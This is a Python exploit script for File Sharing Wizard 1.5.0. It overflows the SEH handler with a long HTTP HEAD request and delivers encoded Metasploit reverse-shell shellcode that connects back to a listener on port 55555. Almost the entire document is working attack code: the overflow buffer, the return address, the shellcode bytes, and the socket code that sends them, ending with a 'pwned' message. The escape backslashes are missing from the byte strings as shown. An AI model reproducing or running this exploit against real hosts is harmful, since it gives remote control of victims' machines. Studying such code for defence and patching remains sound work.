#!/usr/bin/python


print "n##########################################################"
print "##		Team Hackers Garage			##"
print "##		(www.garage4hackers.com)		##"
print "##							##"
print "##	File Sharing Wizard Version 1.5.0		##"
print "##		Remote Command Execution		##"
print "##       	 	Author: b0nd			##"
print "##		(sumit.iips@gmail.com)			##"
print "##                           				##"
print "##	Greetz to: The Hackers Garage Family		##"
print "##	Thanks to: www.exploit-db.com/author/m1k3/	##"
print "##							##"
print "##			&				##"
print "##							##"
print "##		corelanc0d3r (CORELAN TEAM)		##"
print "##							##"
print "###########################################################"


# http://www.sharing-file.net/
# File Sharing Wizard Version 1.5.0 build on 26-8-2008

# Summary: The "HEAD" command leads to SEH overwrite and ultimately remote system compromise
# Tested on: Windows XP SP2
# SEH Overwrite and shellcode pointed out by EBP
# Huge space for shellcode.


import socket
import sys

if len(sys.argv) < 2:
	print "Usage: exploit-code.py <Remote-IP-Address> <Remote-Port>"
	sys.exit(1)

ips = sys.argv[1]
port = int(sys.argv[2])


string = "A"*1040
string += "x90x90x1dxeb"	# nSEH --> Jump to Shellcode
string += "x29xE3xD3x74"	# pop pop ret from oledlg.dll (SafeSEH OFF)
string += "x90"*16		# Nop's

#win32_reverse -  EXITFUNC=seh LHOST=192.168.96.1 LPORT=55555 Size=649 Encoder=PexAlphaNum http://metasploit.com */
#Thumb rule - Don't trust the shellcode ;)
string += ("xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" +
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" +
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" +
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" +
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e" +
"x4dx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx38" +
"x4ex56x46x42x46x32x4bx48x45x44x4ex43x4bx38x4ex47" +
"x45x30x4ax37x41x50x4fx4ex4bx38x4fx44x4ax31x4bx48" +
"x4fx35x42x32x41x50x4bx4ex49x44x4bx38x46x53x4bx38" +
"x41x30x50x4ex41x33x42x4cx49x59x4ex4ax46x38x42x4c" +
"x46x57x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e" +
"x46x4fx4bx53x46x45x46x42x4ax32x45x47x45x4ex4bx38" +
"x4fx35x46x32x41x50x4bx4ex48x46x4bx58x4ex50x4bx34" +
"x4bx58x4fx55x4ex41x41x30x4bx4ex43x30x4ex32x4bx48" +
"x49x48x4ex56x46x42x4ex31x41x36x43x4cx41x53x4bx4d" +
"x46x46x4bx58x43x54x42x53x4bx48x42x54x4ex50x4bx48" +
"x42x47x4ex41x4dx4ax4bx38x42x54x4ax30x50x55x4ax36" +
"x50x58x50x54x50x50x4ex4ex42x45x4fx4fx48x4dx48x36" +
"x43x45x48x36x4ax36x43x43x44x53x4ax36x47x57x43x57" +
"x44x53x4fx35x46x35x4fx4fx42x4dx4ax56x4bx4cx4dx4e" +
"x4ex4fx4bx43x42x35x4fx4fx48x4dx4fx45x49x58x45x4e" +
"x48x56x41x38x4dx4ex4ax30x44x30x45x55x4cx36x44x50" +
"x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x55" +
"x4fx4fx48x4dx43x55x43x55x43x55x43x55x43x44x43x55" +
"x43x44x43x45x4fx4fx42x4dx4ax56x42x4cx4ax4ax42x56" +
"x41x50x48x56x4ax36x49x4dx43x50x48x36x43x45x49x38" +
"x41x4ex45x59x4ax46x4ex4ex49x4fx4cx4ax42x56x47x35" +
"x4fx4fx48x4dx4cx56x42x41x41x55x45x35x4fx4fx42x4d" +
"x48x56x4cx46x46x36x48x36x4ax46x43x36x4dx56x4cx46" +
"x42x55x49x35x49x52x4ex4cx49x58x47x4ex4cx36x46x54" +
"x49x58x44x4ex41x33x42x4cx43x4fx4cx4ax45x39x49x48" +
"x4dx4fx50x4fx44x44x4dx42x50x4fx44x44x4ex52x4dx48" +
"x4cx47x4ax33x4bx4ax4bx4ax4bx4ax4ax36x44x57x50x4f" +
"x43x4bx48x41x4fx4fx45x57x4ax42x4fx4fx48x4dx4bx55" +
"x47x45x44x35x41x55x41x55x41x35x4cx46x41x30x41x45" +
"x41x35x45x35x41x55x4fx4fx42x4dx4ax56x4dx4ax49x4d" +
"x45x50x50x4cx43x55x4fx4fx48x4dx4cx56x4fx4fx4fx4f" +
"x47x53x4fx4fx42x4dx4ax56x47x4ex49x57x48x4cx49x47" +
"x4fx4fx45x57x46x50x4fx4fx48x4dx4fx4fx47x47x4ex4f" +
"x4fx4fx42x4dx4ax56x42x4fx4cx48x46x30x4fx35x43x45" +
"x4fx4fx48x4dx4fx4fx42x4dx5a");

string += "D"*4000 # Some more junk

print "Launching remote BoF on", ips
print ""

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
	connect=s.connect((ips, port))
except:
	print "no connection possible"
	sys.exit(1)

print "rnsending payload"
print "..."

payload = (
'HEAD %s HTTP/1.0rn'
'rn') % (string)


s.send(payload)
s.close()

print "Check your netcat listening on TCP port 55555 for reverse connect shelln"
print "%s pwned!" % (ips)